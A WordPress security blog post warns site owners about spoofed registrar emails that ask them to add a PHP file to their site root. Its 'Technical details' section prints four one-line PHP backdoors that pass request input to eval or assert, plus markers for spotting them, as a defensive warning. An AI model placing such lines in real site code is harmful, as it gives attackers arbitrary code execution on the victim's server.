Security Blog
Security Blog

Do not trust those fake domain confirmation emails

If you ever receive a letter any kind that requests to create, download or install some PHP code on your website you must ignore it


Recently some of my clients received strange email letters from their domain registrars. Those letters contain a request for confirmation domains their own. I checked one of those letters and quickly identified it as a fraudulent letter. All the letters have an identical pattern and a request to create a PHP file in the root folder on a website with a specific name and the given content. Needless to say that suggested content for that PHP file contains malicious code known as backdoor code. This kind of code allows the attacker to execute any action they want on a victim’s website.

If you ever receive a letter any kind that requests to create, download or install some PHP code on your website you must ignore it. No exceptions. Even if the letter comes from the president or your mom.

Fraudulent letters appear legitimate because of legitimate From email address. But it is an email spoofing. You don’t expect to receive a fake email from your friends or your domain registrar. Right? No! Any email letter can contain any From email address. The vast majority of email servers and email clients do not check or verify the sender address. So, you see it as a hacker wanted. You must not trust any email letter you’ve received from known sender if the letter contains a request for some suspicious action like installing code on your website or application on your computer.

Technical details

Fake emails usually contain some of the following PHP lines.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval and assert are well-known markers of suspicious or malicious PHP code.

See also: Plugin Inspector reveals security issues with other plugins

Last posts from WordPress security blog



I’m a self-employed developer who builds software products and services using WordPress for more that seven years. I enjoy partnering with others for interesting and challenging projects. If you’re interested in, feel free to contact me.

View Comments
There are currently no comments.